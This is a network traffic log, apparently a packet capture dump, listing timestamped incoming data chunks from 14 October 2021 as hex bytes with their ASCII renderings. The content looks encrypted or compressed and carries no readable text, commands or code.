2021-10-14 02:15:48 UTC	163	IN	Data Raw: 13 c8 71 16 e6 31 4e bf 0e f2 b3 9b 13 86 ad c9 fe 19 8e fb ca 4a 58 eb 75 e6 17 4f 2e 98 91 a3 02 b3 8c d9 c7 fc d8 27 b9 df 00 2f 06 8d 6c a3 81 3e 8a 97 01 f2 58 14 ec 31 ce 06 18 2d ce 66 f0 f8 76 81 8f b6 88 0b b6 8b 12 0c 64 54 3a c8 a4 80 c7 79 17 33 88 31 98 b0 fb 2d 5e 50 22 cd 4b ee 6b 8c ae b1 e3 28 6a b5 a7 bd a8 97 27 86 1b e5 5b fc 3f e3 83 da 3e a1 48 be d3 1d 3a 1e 55 27 ab a0 c0 af 49 00 de c7 0a e6 83 30 74 42 17 60 23 c8 41 7f 4a 4d ab b4 0f 22 96 87 64 ae ca dc 03 89 f6 91 ba 09 ae be 6a 87 0c 9a 2f a5 f6 9c fb 6b 11 8e f9 b2 62 a7 84 63 6f 8b 43 4d 34 59 a2 57 65 6d c2 2e 9a 62 14 95 9e 70 44 93 87 c3 55 75 de 8c 9f 31 16 e3 25 07 09 07 3c 6b e9 b9 09 e8 7d 0f fa c2 16 2f d2 82 02 11 71 72 5e 39 30 9d 02 17 11 ee 31 32 4f 0c 2f cf c5 Data Ascii: q1NJXuO.'/l>X1-fvdT:y31-^P"Kk(j'[?>H:U'I0tB`#AJM"dj/kbcoCM4YWem.bpDUu1%<k}/qr^9012O/
2021-10-14 02:15:48 UTC	164	IN	Data Raw: 2f e9 a5 39 f0 67 e1 b7 70 0e f1 6c 36 9d 55 14 70 28 42 81 18 1e bc 78 17 3b d1 a8 62 1b 74 74 3b 1c f0 8f b5 50 da e5 f6 f6 b7 9c 59 b7 de f2 59 e0 9d 42 a8 a2 a2 4a 17 67 9b 1b 54 9b 50 28 5c ca 4b d8 65 10 51 c1 25 63 5b a0 f4 10 5b f9 ee 44 34 f6 a7 a2 d7 df c6 96 8e ba f4 6d e9 58 9a 91 a2 06 93 40 ea 78 3e d0 9f c6 83 07 31 63 19 03 ed f7 37 70 d0 77 33 2d 64 b3 b6 7f bf 59 2d bc 20 4a a6 1f e3 4a 95 b8 af bd 90 2d c1 50 1c ff 7d 97 03 2c 41 62 84 0d 4b 5a f5 07 6e 40 90 7f e1 9c 68 df 1f 2c a9 22 18 1d a9 36 23 80 04 4a 2d a1 b1 40 c8 61 e0 52 c4 97 79 60 39 38 f0 f4 4d f9 d8 c5 d4 28 9f 43 9f cd a0 f5 50 f6 9d 72 28 72 56 4d 81 e2 39 2d 0f f4 a9 61 ee 02 c3 73 bd 23 70 f6 84 e3 25 c4 1b b7 9e ad 65 14 c7 b4 dc f7 7e 05 9a 3d b8 d5 db 1d 02 22 fb Data Ascii: /9gpl6Up(Bx;btt;PYYBJgTP(\KeQ%c[[D4mX@x>1c7pw3-dY- JJ-P},AbKZn@h,"6#J-@aRy`98M(CPr(rVM9-as#p%e~="
2021-10-14 02:15:48 UTC	166	IN	Data Raw: 75 09 ef 0b 21 31 11 7a 2f b0 02 15 c5 64 91 f6 3d 8e af 2c 22 c1 71 40 e3 08 32 c6 07 da d9 50 fc 23 57 f4 63 4d 09 a8 ef c9 cf 61 a8 d3 86 bc a4 1e 1d ac 8e 64 b9 a0 1d db 0c c9 e1 c7 f9 73 df 15 c0 04 c8 1c 8d 03 a4 0f aa a5 cc cc e4 d5 d8 a6 7e 9c 26 15 2e 73 02 5d 19 c1 aa 0f 53 50 1a fc b1 d2 d9 5e 31 d8 6e e6 21 03 fc 9e 02 c3 8b c4 8c 52 d6 26 82 fd c8 e4 91 b3 bb bb 24 c8 5e ff d8 fe 2c 1e 34 34 6a 2c fe 78 49 d0 d9 b9 3f 2e b7 fa d5 77 97 63 e9 0d 42 3c fc 2c c5 fb fb 56 a6 00 f1 92 3c d7 1e 1d 49 f1 79 42 a8 01 f1 99 e6 3d ea c9 db 3f c2 c6 ce 69 f1 62 79 37 59 b8 51 4c b4 cd 94 29 26 81 4a dd 9d bb 29 f1 9f 18 ad 27 b9 7b 0c 2b b0 bb 7c a2 fd e9 85 b4 9d 1a 50 2d 6e 22 e2 19 ba 70 49 ef f1 1a fb 37 39 d7 b8 14 d1 d0 68 57 91 de 01 14 72 b8 80 Data Ascii: u!1z/d=,"q@2P#WcMads~&.s]SP^1n!R&$^,44j,xI?.wcB<,V<IyB=?iby7YQL)&J)'{+\|P-n"pI79hWr
2021-10-14 02:15:48 UTC	167	IN	Data Raw: 49 ca b2 41 bc c5 b4 ce d5 c8 6f 39 43 77 c7 17 99 d8 5b 69 b3 2e cd 5b 47 e5 c3 09 7b db 1e a7 1c 6d c7 c9 a0 b4 3b f6 9f 3a b4 f1 68 03 eb f5 99 26 8e 3b 28 20 b1 03 89 6d fc 57 23 1f 1a c1 7e 04 4b 86 28 10 93 44 8f 6d 0c 06 8b 86 78 8c 92 6f f7 84 ad 0f e0 f3 66 6b ce cb c2 79 a9 86 66 41 fa 35 cb 67 20 07 0a 1f c8 78 8f 30 90 8d c8 16 98 5d 3e 87 13 cb e4 e8 70 51 f7 95 bd d1 08 31 0f bd ba f2 6d 76 fc ab 93 a4 1b be 98 d8 c8 39 d5 4e c7 b1 b1 20 63 6b 1f 93 0b 31 c4 a3 73 0a 2f 62 5c 42 79 86 46 2b 52 8e f4 95 1f e4 4a e7 0c 26 a0 96 2c b1 bf 2e 46 7a 95 f5 2a 73 79 86 0d d4 5a c5 f7 68 fb bc 7a d2 9e 6e 2f 77 2d d7 3c 1c eb db 8c 1b 80 03 4a da e4 8c 42 ce 60 33 a9 f6 2e 7e 62 4b 39 c3 1b 54 f9 aa d9 c1 0e 98 e8 ec ce b1 f7 56 84 ee 73 3b 71 52 5b Data Ascii: IAo9Cw[i.[G{m;:h&;( mW#~K(DmxofkyfA5g x0]>pQ1mv9N ck1s/b\ByF+RJ&,.Fz*syZhzn/w-<JB`3.~bK9TVs;qR[
2021-10-14 02:15:48 UTC	168	IN	Data Raw: e3 55 46 02 81 8f 93 e8 63 65 eb 1c 20 10 36 25 70 da 12 7d b5 36 5e ea 0e 45 9b b0 bf 3a 42 f2 c7 8f 1a 89 d0 10 c2 25 a8 1b 90 08 02 2f fd 0d ef 32 b1 82 df f9 54 e1 f6 39 76 95 3c 20 c0 71 96 4c 18 26 e7 75 7e f1 49 ee 22 57 76 6e 5d 8b a9 f9 34 b0 70 ba db 96 68 19 50 1f ad 8e 38 85 ad e8 dc ab ad f8 ca 67 2d df 58 f4 17 db 1d 47 af 57 00 b9 a4 84 8c fa d8 da a7 6f 1a 34 05 ca 70 13 9b c0 ea a8 0e 53 42 17 ec 7e c5 5f 10 2e ce e8 82 27 7e fa 8d 11 95 5a b5 e4 1b d9 70 22 69 ce a4 8f e5 2a 24 2f 9f 29 a0 49 d3 f3 3d 2a 32 6c 51 e9 6b 39 87 df c2 2f 6a 2d c7 55 80 91 27 e6 0b 36 40 a3 3c d6 ad 5b 48 a7 48 ef c4 aa 20 6a 54 ba ae e8 dd 29 38 ef cf 66 10 fb 81 b7 68 14 1d dd 21 9b 10 7f 4a 5f ab 45 1a 46 be 3d 6e 2c d7 b6 5f 9b f6 37 a7 09 87 de 6b 4e 27 Data Ascii: UFce 6%p}6^E:B%/2T9v< qL&u~I"Wvn]4phP8g-XGWo4pSB~_.'~Zp"i$/)I=2lQk9/j-U'6@<[HH jT)8fh!J_EF=n,_7kN'
2021-10-14 02:15:48 UTC	169	IN	Data Raw: 4c d3 b4 40 d9 f0 b0 c2 55 70 f1 9d 23 05 d7 23 73 5e 64 12 5b 22 f0 1c 09 cc 41 e1 5d cf 96 ca f8 18 e0 ba 9d 16 f9 1b 58 94 9e 17 ef bb d0 98 98 56 8b 2b 2f 28 2a e9 c4 b5 cd 77 3f 33 b1 cc 4e 2d b0 7e 1c 7e c1 17 f1 9c a4 c5 dc 8f e2 fd 93 c7 24 23 a8 cd f0 e9 e0 b5 70 0d f1 3b 2d a1 70 f8 72 da 42 0f 19 1c bc 7b 17 0f d3 ef 69 3c 78 86 3b 8c f1 8d b5 57 da 54 f3 cb bc 90 56 45 de 61 58 e2 9d 41 a8 ee b6 06 1c c1 94 e9 54 0c 51 8a 5c c9 4b a5 7e 2c 74 30 27 91 5b 3e f5 12 5b fa ee 36 20 b1 ac 7d d8 2d c6 09 8f b8 f4 6e e9 bb 9a ac a9 d4 9c ba ea ca 3f d5 9f c5 83 f5 25 2f 12 62 e2 31 37 9b 4b 72 33 2d 64 4d ad 3d 9a c2 2d 77 20 47 85 1d e2 4a 95 0b ae 81 b5 3f c3 9b 1c 38 e6 95 02 2c 41 68 80 7f 4a bd f8 d0 6e c7 0a 7d e0 9c 68 3e 05 db af a5 1a ce a9 Data Ascii: L@Up##s^d["A]XV+/(*w?3N-~~$#p;-prB{i<x;WTVEaXATQ\K~,t0'[>[6 }-n?%/b17Kr3-dM=-w GJ?8,AhJn}h>
2021-10-14 02:15:48 UTC	171	IN	Data Raw: 05 4e 3c 41 1b 6b 5b f8 20 e7 e1 98 35 3a 0b 9b b9 f7 46 58 7d 96 21 42 68 dc 90 32 08 82 d6 b5 34 5d 1b a6 e9 e3 bf ea 81 c8 8a ae 1a 80 8f 93 e8 70 e5 99 0c 9c 66 1d c0 50 c3 13 7d b5 36 4d 6a 23 54 fb d8 94 d1 2a eb c6 8f 1a 89 c3 90 2f 36 78 78 bb f2 4a 36 fc 0d ef 32 a2 02 40 ed af 91 dd 3d 2f 9d 3d 20 c0 71 85 cc 35 37 50 1d 55 fa 88 e7 23 57 76 6e 4e 0b b7 fb cf c0 5b aa 9a 9c 69 ad 0e 1f be 8e f1 96 60 05 f0 0c 2d f3 cb fb 72 df 4b f4 98 fb ed 9c 90 b1 92 b4 a5 cc ec fa cb da c1 6a c1 2b 2c 2c 22 1f 9a 38 8a a8 1d 53 30 07 9c bb f9 d9 1c 21 cf 70 e0 27 6d fa 9a 06 65 1a 9c 8d 5e eb 71 02 0a ce b7 8f c8 3c 92 21 a2 40 21 7d d2 2b 5e 2a 21 6c a2 fa 7b 40 ac 59 b3 18 6b a9 ac 55 93 91 55 f6 be 5f 6b fa cf e1 ac 7b 24 a7 5b ef 81 8e c6 1a 7f 57 ff de Data Ascii: N<Ak[ 5:FX}!Bh24]pfP}6Mj#T/6xxJ62@=/= q57PU#WvnN[i`-rKj+,,"8S0!p'me^q<!@!}+^!l{@YkUU_k{$[W
2021-10-14 02:15:48 UTC	172	IN	Data Raw: ae 8d 51 e7 20 9b 04 ce f3 4b 4c 57 40 50 5d dc 43 27 33 7a 28 7e e8 ae 84 69 e7 65 9e c5 4f 40 bc 66 cf e0 14 f6 56 b7 f0 0b b2 b5 f0 40 f0 b6 ca 08 7e d4 eb 6d 16 ab 42 72 6a fe 12 5d 2a 99 50 f5 dd 1a f2 d5 ae 97 ca f8 18 e6 b1 a0 24 cf 26 2d 65 20 76 ee bb d0 98 9e 5d c1 59 b4 6c 71 47 03 d4 cc 77 3f 33 b7 c7 e6 7e 96 47 46 6f 32 76 f0 9c a4 c5 da 84 54 ae 6e 8a 7e 98 af ad f1 e9 e0 b5 76 06 f2 23 10 99 07 09 4c ba 43 0f 19 1c ba 70 0a 57 2e a9 30 92 3f e6 3a 8c f1 8d b3 5c ae 1d de f7 e4 81 25 25 df 61 58 e2 9b 4a 2b a7 2d 49 44 7a 13 89 55 0c 51 8a 5a c2 f3 82 d7 14 05 c1 99 f1 5a 3e f5 12 5d f1 2d 51 9f f2 f3 bf 1f 4d c7 09 8f b8 f2 65 ea e1 d0 90 f7 1b 6f da eb ca 3f d5 99 ce 8c af e6 63 4c 1e e5 52 36 c4 d1 72 35 25 5e 52 9d 61 e9 44 11 14 21 f3 Data Ascii: Q KLW@P]C'3z(~ieO@fV@~mBrj]*P$&-e v]YlqGw?3~GFo2vTn~v#LCpW.0?:\%%aXJ+-IDzUQZZ>]-QMeo?cLR6r5%^RaD!
2021-10-14 02:15:48 UTC	173	IN	Data Raw: 5b d4 c5 dd 90 12 70 29 72 5a 4e c4 b0 bb 1f e2 c4 1e f0 13 55 3d bd 85 87 42 29 63 04 3e 09 ba 7a fc 45 50 7f c0 4d 28 41 04 e6 3a 40 0a 6b 29 ea 56 76 95 68 b8 9b 0a 07 b3 f6 50 58 0f 84 b7 48 28 2c 35 3a 08 12 c4 b4 32 45 27 90 fa 91 cf 50 0d 6e 8b 4e 0e 81 e9 90 9a 62 65 ca 7c 00 be bb c1 78 d6 12 7b ad 0a 7b 79 0e 22 bb d5 33 d0 4a fe c7 e9 19 d8 c0 83 c2 42 88 4f 1c f3 0a 21 fd 49 ec 40 b0 fc de 9e 74 a7 7a 3c 7f 85 3c 31 d8 33 b3 4a 18 41 c7 af f2 fb 40 fe 22 41 76 1c 5c 20 8d 9e 14 3e fc ab d2 86 68 bb 0e 6d ac bf 1c e5 ad b7 54 0d a5 e9 ca ed 72 ad 59 b7 33 b8 1d ed 35 b0 02 a8 a4 da ec 88 d9 84 83 0a 1a 39 96 2d 72 02 9b 2e 8a da 0f 22 66 72 ec db 43 d8 10 3f ce 76 e0 55 7f 7d a9 75 95 a7 26 8c 12 c8 70 04 0a bc a5 15 c1 4d 24 cd 18 41 a9 58 d3 Data Ascii: [p)rZNU=B)c>zEPM(A:@k)VvhPXH(,5:2E'PnNbe\|x{{y"3JBO!I@tz<<13JA@"Av\ >hmTrY359-r."frC?vU}u&pM$AX
2021-10-14 02:15:48 UTC	175	IN	Data Raw: ec e1 05 f7 3b 1f ff fd 9c e6 63 07 fd bc 33 58 bc 6e 25 9b 49 02 1c 3f 59 02 ba 22 98 a3 bb 7c cf 04 57 f9 ea 27 8f 75 dd ed 8c 40 e7 52 9c a7 35 87 8b 04 fb 41 58 19 dd 52 27 41 7d eb 13 b8 8b 70 c6 e6 59 da c4 59 40 4b 66 d7 b2 44 08 2b 12 f1 43 f6 b4 e6 40 6f b1 49 45 0b f1 d3 ce 17 d7 06 73 7c fe 60 5a 5c db 25 0b 18 a5 f3 5d ea 96 dc f8 ef e6 c7 b6 6d e1 93 5f 65 9c 32 ef bd c8 a4 bd 46 8b 10 2c 2f d2 46 cb 90 cd 61 3f 41 b0 17 65 16 b3 87 e3 6e ce 32 f1 8a a4 b7 dd 7c c9 c6 90 af d9 99 a7 e8 f0 ff e0 42 76 04 dd 40 35 e5 a2 08 70 ff 42 09 01 20 99 5b 34 34 d0 38 95 93 77 a3 3b 8a e9 b1 90 05 f6 6f f0 7e 4f 80 59 60 de 07 5b b3 8d 51 a8 d5 b5 9b ee 7b 9b cc 54 0a 49 b6 79 0a 4b de 66 a4 73 c1 25 b4 5b 38 ed 2e 7e ea ee 0d 23 02 5e be d7 08 c6 0a 87 Data Ascii: ;c3Xn%I?Y"\|W'u@R5AXR'A}pYY@KfD+C@oIEs\|`Z\%]m_e2F,/Fa?Aen2\|Bv@5pB [448w;o~OY`[Q{TIyKfs%[8.~#^
2021-10-14 02:15:48 UTC	176	IN	Data Raw: 93 78 6c 68 1a f9 fd 63 66 c8 26 f1 02 0e 3e 61 15 cf 6c aa f8 6f 3b 98 4a 3e 67 46 4c b6 8c 7c e4 c5 3b 3d eb 8a f5 1f 0c cd d4 24 c9 6e 2c 28 79 63 28 4c 8c 38 ba 89 e2 fa 1c 16 63 29 2e f0 f7 85 76 a3 62 92 3e ed ad 9c 09 3e 43 17 b2 4f 60 ca 05 70 3a 28 18 8d 59 96 20 d1 e7 6a 24 10 0b 91 b3 d7 51 be 7f f8 21 f4 5a 2e 81 18 08 84 c4 26 37 bb 19 c8 e9 2a bd 52 89 e2 8a d8 0e ca 98 75 ea 1e e5 3c 0e 02 62 37 c0 ee d6 ce 7e 53 34 23 6a fc 50 b9 c2 be d1 dc fe 55 97 fc 8b ad 90 cc 37 8a 69 91 f2 9c 21 fb 09 09 30 cc 02 f5 eb 76 93 f7 3d e9 85 62 3a 26 73 eb cc 5e 34 c5 07 7f fa d6 fe 12 53 90 6c 20 0b c8 eb 16 c2 71 aa 44 86 75 b6 e8 1d d0 8e 45 90 af 1f da 0c 33 e9 ae ff 94 dd 25 f4 8e ce 1f 8d ba b1 94 a8 4f d3 0a f8 a5 da 12 7a 18 29 06 2c e4 02 15 3c Data Ascii: xlhcf&>alo;J>gFL\|;=$n,(yc(L8c).vb>>CO`p:(Y j$Q!Z.&7*Ru<b7~S4#jPU7i!0v=b:&s^4Sl qDuE3%Oz),<
2021-10-14 02:15:48 UTC	177	IN	Data Raw: 0d 03 27 e2 13 3c 2b 6f e9 42 12 df 67 85 fb 3a 06 62 f4 38 0f 81 7a d3 44 a9 30 72 05 50 09 95 31 d4 61 04 37 c9 c5 84 22 52 f6 e3 87 47 41 f4 8e 9e 3e bc 06 6b bc 74 49 5a 9b 5e 6f 63 71 1e 23 b9 03 2c 22 a8 b7 5d 89 b4 5a 1e 8a e8 43 6f 74 4b ed 85 59 01 22 e0 0c 7b f4 89 4c 1a 40 ce 19 51 41 c1 31 01 20 bf cb 89 80 27 e7 cf da 32 46 a6 be 1d c7 11 37 0a 57 f9 f0 d5 f6 0d f2 a6 f2 cd c2 9f 78 f3 ef 22 16 41 06 25 7e 18 10 26 22 1c 56 09 dc 55 f2 cb ea 75 c8 1e 1a 9d b9 93 1f e3 27 7d 65 0a 32 6f af 36 9a e5 55 a4 62 2e 6f 21 47 5d 90 c0 74 d9 31 cc cf 1e 64 b1 43 17 6f 58 32 15 89 42 c7 a1 8c 93 b4 92 8b 2f 98 31 e8 b1 ea 06 b7 0d 0e 63 32 37 9d 55 09 e6 ff a5 19 ff 1e c1 78 a3 46 d2 a8 62 92 e1 a3 50 8f 17 8f c8 54 0f 1d f2 f6 b7 81 cf 60 fa 76 be e0 Data Ascii: '<+oBg:b8zD0rP1a7"RGA>ktIZ^ocq#,"]ZCotKY"{L@QA1 '2F7Wx"A%~&"VUu'}e2o6Ub.o!G]t1dCoX2B/1c27UxFbPT`v
2021-10-14 02:15:48 UTC	178	IN	Data Raw: 00 95 0b 20 8d 65 c9 96 00 77 ce 34 9b e7 3b 24 25 1e 40 55 5e 35 29 23 2a 80 78 53 f8 6b 4b 10 59 62 3f 8c ab d1 55 54 85 25 f7 0b 44 d7 fa 0d c0 4b 79 59 a7 be fb c6 bc 20 18 c3 57 71 f8 3b ab 34 ef d7 73 12 ed 81 c5 ff 42 a4 c8 c7 ed 19 7f 70 4a a9 53 1a 34 29 95 13 3a 31 c8 57 9b aa 22 a5 1f 87 ac fc a7 cc 85 e0 b5 8b 62 8a 68 3a 84 f9 83 da d0 27 6b 89 fe 32 3a 93 5e a0 ef 4c 7b 7d 30 b9 b2 f4 d5 d0 6e 86 86 8a 81 66 73 48 9e 71 6a ed e7 58 9f f7 b3 24 6d e9 42 84 49 0c 1d 1c de 79 1f f2 92 00 83 7a d3 d2 3f c8 61 e4 b4 76 e8 19 1c 6e 06 37 c9 53 12 ed f9 11 07 f8 3a 0b e2 82 9c 3e bc 90 fd 9e 30 a8 be e4 23 03 54 7d 1c 23 b9 95 ba f0 8e 53 b9 f6 c9 d4 4a 86 ea 43 6f e2 dd bb 8f b7 e5 5d 9d a3 09 f8 8b 4c 1a d6 58 16 ca a5 25 4e 7c f1 2f c7 8b 80 27 Data Ascii: ew4;$%@U^5)#*xSkKYb?UT%DKyY Wq;4sBpJS4):1W"bh:'k2:^L{}0nfsHqjX$mBIyz?avn7S:>0#T}#SJCo]LX%N\|/'
2021-10-14 02:15:48 UTC	179	IN	Data Raw: 10 c7 c1 39 85 bd 3c 88 12 9f d9 ec 70 23 f6 31 bf 18 0d 20 0b f2 b8 12 4d eb fd 99 91 34 1b d5 ae 0c c8 42 d5 97 e7 81 b3 26 63 8f 1e e7 12 d1 c6 ac 72 1a 0c 66 5c b5 7f 29 44 36 60 c6 f1 da 1d a9 6b 97 0d b6 bd 06 2c f7 b8 fa 46 01 95 6f 0d 43 7b 80 0d dd 5b 69 c7 88 f9 ec 7d 6f bd 6a 2f 05 2c 3f 23 44 ed 4f 8f 5f 82 b5 6b 2f e2 b5 40 5e 60 1c 9c 22 2e 05 62 e8 19 f2 37 52 f9 4e d8 f3 23 78 fa e3 cf 52 d4 52 84 9c 72 be 73 df 5d 66 3c 45 2f 1a d6 ab 96 e8 02 55 6e c7 3b 97 28 f8 e1 12 e6 19 c0 9a ad f3 09 38 94 3b 2b 02 00 c3 1f ba 38 fb 1d 94 3f 57 95 13 91 e5 6e f5 3a 86 fd bd 64 5c 26 c4 05 7e 3c 61 01 b4 4c d5 f8 95 39 0c 4a e7 66 36 4e c1 8f 24 c4 ba 3b 2b e8 1e f5 a9 0b bd d6 b8 dc 57 0c 57 79 51 2b d8 8c 42 b8 f9 e0 b9 1f f0 42 56 2e bd f4 11 76 Data Ascii: 9<p#1 M4B&crf\)D6`k,FoC{[i}oj/,?#DO_k/@^`".b7RN#xRRrs]f<E/Un;(8;+8?Wn:d\&~<aL9Jf6N$;+WWyQ+BBV.v
2021-10-14 02:15:48 UTC	180	IN	Data Raw: 1d 4c be 57 00 d5 a4 c8 c1 f8 d8 da a7 e8 1a 43 27 ca 70 7f 9b 1e a7 aa 0e 53 42 90 ec 58 d7 3f 12 42 ce 38 cd 25 7e fa 8d 96 95 df 97 6b 10 b5 70 68 27 cc a4 8f e5 ad 24 39 8d a6 ab 25 d3 a7 73 28 32 6c 51 6e 6b 9e a3 bf c9 43 6a 07 81 57 80 91 27 61 0b 02 44 1c 3d ba ad ab 09 a5 48 ef c4 2a 20 04 78 b1 a5 84 dd 58 64 ed cf 66 10 7b 81 b5 6c a4 15 b2 21 fd 4a 7d 4a 5f ab c5 1a c1 8f 73 66 45 d7 f9 04 99 f6 37 a7 89 87 04 6f 41 2f f1 06 e3 d8 60 f4 7d 38 12 f9 9c 7d 36 81 14 6f 8a 61 38 33 4b a2 79 4c a9 ee d6 98 db 12 4f 83 6c 44 93 88 17 66 3a ef 78 bd 15 0b 5f 0b 9d 13 a6 26 fb e9 4f 14 af 65 74 fa 07 2a 1d f4 84 02 15 7a cd 76 d9 32 1e 02 4b 25 ea 31 0a 6c 90 37 fe c3 f4 20 91 f7 1a aa 38 41 f4 80 0a 3e 1b 34 1b be 4e 4e fc b6 21 6f 42 7f 8a 23 d8 05 Data Ascii: LWC'pSBX?B8%~kph'$9%s(2lQnkCjW'aD=H* xXdf{l!J}J_sfE7oA/`}8}6oa83KyLOlDf:x_&Oet*zv2K%1l7 8A>4NN!oB#
2021-10-14 02:15:48 UTC	182	IN	Data Raw: 75 74 75 de 3b a3 c8 8f b5 54 da 84 f0 1e b4 67 5b 1d de 30 61 e0 9d 42 a8 3e b5 5b 0e 9c 99 b1 54 7e 68 88 5c ca 4b 35 66 02 55 27 27 c9 5b aa cc 10 5b f9 ee e6 23 53 bd 59 d5 75 c6 bf b6 ba f4 6d e9 6b 99 ad a6 fd 91 e2 ea 12 06 d7 9f c6 83 25 26 04 02 f8 ef 69 37 3e e8 70 33 2d 64 ca b5 0f bb a2 2f 2f 20 e8 9d 1f e2 4a 95 9b b6 4a 8f ca c1 c3 1c 78 46 97 02 2c 41 ed 80 97 4f bd f5 88 6e a6 ab 7f e0 9c 68 b9 05 3b 88 c5 18 96 a9 f3 18 80 05 4a 2d 74 b5 84 cc 86 e0 d5 c4 8c 42 60 39 38 f0 a1 52 94 f9 3e d6 5f 9e 39 a4 cd a1 f5 50 12 9c 9c 2c 95 56 26 80 dc 02 2d 0f f4 a9 00 e8 88 e7 88 bf 47 71 29 be e3 25 c4 1b 56 9a b2 60 ef c5 ef dd 0d 44 02 9a 3d b8 ae fb 1c 2a d9 f9 e9 f5 d6 a3 6c 8e 18 84 6b bd 2d cf c0 f3 7f 98 58 27 03 29 6e d7 6e 95 88 b7 ac 3c Data Ascii: utu;Tg[0aB>[T~h\K5fU''[[#SYumk%&i7>p3-d// JJxF,AOnh;J-tB`98R>_9P,V&-Gq)%V`D=*lk-X')nn<
2021-10-14 02:15:48 UTC	183	IN	Data Raw: 05 02 fa 21 bb 20 57 76 6e cb 0b cb fb f2 c0 0c aa 50 c3 6a ad 0e 1f 3b 8e d7 96 4b 1d a7 0c 01 ac c8 fb 72 df ce f4 85 de fb 8f c7 b1 c4 ed a6 cc ec fa 4e da be 7d fc 2b 7b 2c 9a 47 99 38 8a a8 98 53 b1 13 0a b1 ae d9 19 79 cc 70 e0 27 e8 fa c0 03 73 09 cb 8d 38 8e 72 02 0a ce 32 8f 16 2d c2 27 f5 40 e2 1e d1 2b 5e 2a a4 6c 26 fb 8d 49 fb 59 a7 78 68 a9 ac 55 16 91 17 e0 ed 46 3c fa b1 81 af 7b 24 a7 de ef 65 bf c6 1a 28 57 17 bf df a9 49 ef 59 66 8e fa 67 c7 14 42 c5 89 23 ef 64 7f dc 5f 40 50 fc 36 c2 95 90 7e d5 ca 2a 9b 60 37 b3 06 61 ae 17 a7 3b cb 04 b7 f6 62 62 7d 2d 80 1f 81 31 d0 bb 2e 6d fc 4f 3a a5 4b 0a f5 aa 79 96 30 c3 e1 10 d7 ad 6e d2 93 b7 85 80 71 a3 9e c4 2f 09 e5 25 9f 85 a6 4c 76 0f 40 6f 49 fa 4e f8 dc 04 1f 62 84 71 87 9c d1 39 3f Data Ascii: ! WvnPj;KrN}+{,G8Syp's8r2-'@+^l&IYxhUF<{$e(WIYfgB#d_@P6~`7a;bb}-1.mO:Ky0nq/%Lv@oINbq9?
2021-10-14 02:15:48 UTC	184	IN	Data Raw: 6f 5e 63 f3 9c a4 c5 4a 8c ba ba 76 89 52 98 15 b9 f2 e9 e0 b5 e6 0e 5d 3b d3 9f 28 09 a3 ae 40 0f 19 1c 2a 78 8c 48 36 aa 1f 92 82 f2 39 8c f1 8d 23 54 fa 15 16 f4 ca 81 4e 32 dc 61 58 e2 0b 42 65 a9 53 48 6a 7a a3 9e 56 0c 51 8a ca ca 1d a4 80 12 2c c1 7f e6 59 3e f5 12 cd f9 d1 72 c5 f4 da bf ac 5a c4 09 8f b8 62 6d e8 f4 7f 93 df 1b 0e cd e8 ca 3f d5 09 c6 18 b1 c0 61 64 1e 53 46 35 c4 d1 72 a5 2d 4e 57 53 7d c2 44 f2 00 22 f3 a7 1d 74 4a 5d 0f 50 bf ed 2c c3 ed 1e 44 7c 95 94 2c 24 6f 66 0f 36 5b d6 a6 6c fb 91 7d 76 9c 9a 2d e3 2e d4 23 59 b8 ab 8d 22 82 93 4a b8 f6 53 42 b5 60 86 fb c6 2c 78 62 af 38 ec 34 b4 fb a5 d8 51 71 9c f8 9e cf 37 f5 a6 91 7a 70 55 73 f3 08 82 3e 38 2f 99 f4 f9 95 0e 00 be 6e 74 69 73 2a 85 e1 b3 c4 ed d6 7c af 18 09 2d c1 Data Ascii: o^cJvR];(@xH69#TN2aXBeSHjzVQ,Y>rZbm?adSF5r-NWS}D"tJ]P,D\|,$of6[l}v-.#Y"JSB`,xb84Qq7zpUs>8/ntis\|-
2021-10-14 02:15:48 UTC	185	IN	Data Raw: e3 d3 4a fe c7 19 1a 60 e0 76 c0 4e 88 8e cc f0 0a 21 fd 9b ef bc b4 e4 dd 92 74 9b a9 3f 7f 85 3c b6 c0 62 a7 2a 1a 4d c7 2d 21 f8 40 fe 22 c1 76 a8 58 ed ab 92 14 8e 2f a8 d2 86 68 3b 0e 22 9c 68 3a e9 ad 71 84 0e a5 e9 ca 6d 72 de 5e 12 15 b7 1d 1d e4 b3 02 a8 a4 5a ec eb ea 3c a5 03 1a 98 58 2e 72 02 9b ae 8a 83 08 b5 40 7b ec 61 8d db 10 3f ce e6 e0 7e 4c 1c 8f 7d 95 ff e8 8f 12 c8 70 94 0a 9b a2 69 e7 46 24 33 d7 42 a9 58 d3 bd 5e df 06 8a 53 85 6b 73 d9 5b cb 3e 6a 3f ac 0e 81 77 25 8a 0b 1e 1e f8 3f c7 ad ed 24 08 4e 09 c6 c1 20 64 0a 55 a7 f9 dd 3f 49 71 ce 80 12 90 81 5b 36 40 17 cf 21 79 64 5c 4d b9 a9 2e 1a 8b e0 97 64 38 d7 5c 2a 4b f7 d1 a5 62 87 4c 35 a5 2d 8c 06 21 f6 3b f3 9b 3a f9 f9 81 2c d2 83 69 6f 6a 4f 78 31 ad a0 92 4c 5f 8b 32 9a Data Ascii: J`vN!t?<bM-!@"vX/h;"h:qmr^Z<X.r@{a?~L}piF$3BX^Sks[>j?w%?$N dU?Iq[6@!yd\M.d8\KbL5-!;:,iojOx1L_2
2021-10-14 02:15:48 UTC	187	IN	Data Raw: 78 1b 94 0b f8 92 e8 4e 9f d1 e1 76 75 9b 9d f3 ef 33 c8 66 9a 94 8b 51 03 7c 21 56 ca cf d8 74 3c 2a b0 7e 65 61 b0 5a 16 9e fd 3d f2 b5 a5 74 f7 86 e1 8a 91 bf 39 43 a5 21 f0 6c c7 a3 73 c7 f1 67 39 81 56 30 71 6a 4e 46 18 d5 bc 0d 0e 5a d0 e9 63 54 53 81 38 cd f0 39 91 d2 da 3b f1 5f a7 a9 5a 49 df c4 6b cf 9e 6b a9 1a 92 7e 14 2b 9a 67 77 30 52 53 5c 70 79 e3 65 c9 51 80 36 f3 58 e7 f5 59 4b ea ee 11 22 f1 bc b5 d4 69 c7 1c ac f5 f7 04 e8 7f 86 17 a2 6a 92 a3 cf d9 3f b4 9e ab 96 ea 25 e2 18 f5 e2 4a 34 45 d0 74 1f 49 67 d5 b4 9d 9b 0d 2c c3 21 63 ac 77 e1 f3 94 67 a6 39 93 ed c2 37 34 cf 7f 0c 03 55 69 ea 83 94 4a 35 e4 0b 6f 62 90 7c d0 04 6b b6 04 d0 85 dd 1b 72 a8 09 0b 1a 06 d3 2c 94 bc 80 c8 f9 e3 96 ea ec 78 fb 38 07 e0 aa 51 28 d9 f7 cb 6b 9f Data Ascii: 